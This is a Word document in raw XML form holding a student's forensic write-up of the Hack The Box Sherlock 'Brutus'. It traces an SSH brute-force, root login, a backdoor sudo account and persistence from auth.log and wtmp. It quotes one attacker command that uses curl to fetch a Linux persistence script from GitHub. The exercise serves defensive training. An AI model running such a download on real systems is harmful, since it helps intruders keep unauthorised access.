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9CE3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 brutus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3AF64E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB38FA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Lets just download the fil from the sherloack section of hack the box and try to do this one Brutus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5660C493">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="2421890"/>
            <wp:effectExtent l="0" t="0" r="889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3377A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02191375">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F379B8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 just opened the auth.log file in the kali linux and the try to analyse it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1391016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When I get a little bit down in it I ge to know the ip address of the attackers who is trying to brute force the passsword for the admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB8829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Ip 65.2.161.68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207754C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690245"/>
            <wp:effectExtent l="0" t="0" r="8890" b="10795"/>
            <wp:docPr id="3" name="Picture 3" descr="Screenshot 2025-02-04 124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2-04 1246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962A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03782D8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0340" cy="921385"/>
            <wp:effectExtent l="0" t="0" r="12700" b="8255"/>
            <wp:docPr id="2" name="Picture 2" descr="Screenshot 2025-02-04 124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2-04 1246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8DD0">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38556E9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see that some of the failed login attempts are there and we get to know that after some time the user brute-force the root password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E8D54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744220"/>
            <wp:effectExtent l="0" t="0" r="8255" b="2540"/>
            <wp:docPr id="4" name="Picture 4" descr="Screenshot 2025-02-04 125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2-04 1253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0366">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FF4BE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901065"/>
            <wp:effectExtent l="0" t="0" r="0" b="13335"/>
            <wp:docPr id="5" name="Picture 5" descr="Screenshot 2025-02-04 125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2-04 1254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5783">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8E1F97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The attecker tat has gaoned access to the system has given a session id as 37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B9FD9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4310" cy="527685"/>
            <wp:effectExtent l="0" t="0" r="13970" b="5715"/>
            <wp:docPr id="8" name="Picture 8" descr="Screenshot 2025-02-04 130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2-04 1301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00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We just checked the wtmp file and saw the time line there </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DBBC1B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810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7304D"/>
    <w:p w14:paraId="5FDA40CE">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="888365"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10795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8D19E"/>
    <w:p w14:paraId="04624044">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We just get to know that the session for the root user is terminated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33C5CE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676910"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:docPr id="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4EC869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F486C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825500"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="9" name="Picture 9" descr="Screenshot 2025-02-04 130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2-04 1303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6EE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E645061">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We get to know that the attackers have made a new account in the system and named it as cuberjunkie and has given it sudo root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498202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593725"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635"/>
            <wp:docPr id="6" name="Picture 6" descr="Screenshot 2025-02-04 125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2-04 12590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7474">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E5366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733425"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13335"/>
            <wp:docPr id="7" name="Picture 7" descr="Screenshot 2025-02-04 125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2-04 1259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A9C3">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DF8E1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As the user have created a username the lets just see the MITRE ATTACK list of persistence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0214FBE1">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3575050" cy="4126865"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175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CCDE8">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4005580" cy="1794510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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5580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60580">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446C9CFE">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1259205"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5715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FFBD9">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0895CEF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2024-03-06 06:37:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2665AA74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4150" cy="457835"/>
            <wp:effectExtent l="0" t="0" r="8890" b="14605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5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E0291">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="5715" b="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EDAD2">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE0A7A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We just saw the command that the attacker executed in the system is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E61CA0">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532C946A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E686B1">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="262255"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12065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B3484">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B3C651">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="778510"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1397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EA5D8">
      <w:pPr>
        <w:numPr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74E07"/>
    <w:rsid w:val="031B02A5"/>
    <w:rsid w:val="44E06E0E"/>
    <w:rsid w:val="515D6A1C"/>
    <w:rsid w:val="7DD7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2025-02-04T07:14:00Z</dcterms:created>
  <dc:creator>yash yadav</dc:creator>
  <cp:lastModifiedBy>yash yadav</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-04T08:16:00Z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05530A16E2814CA49E030BD2BEDB04BF_11</vt:lpwstr>
  </property>
</Properties>
</file>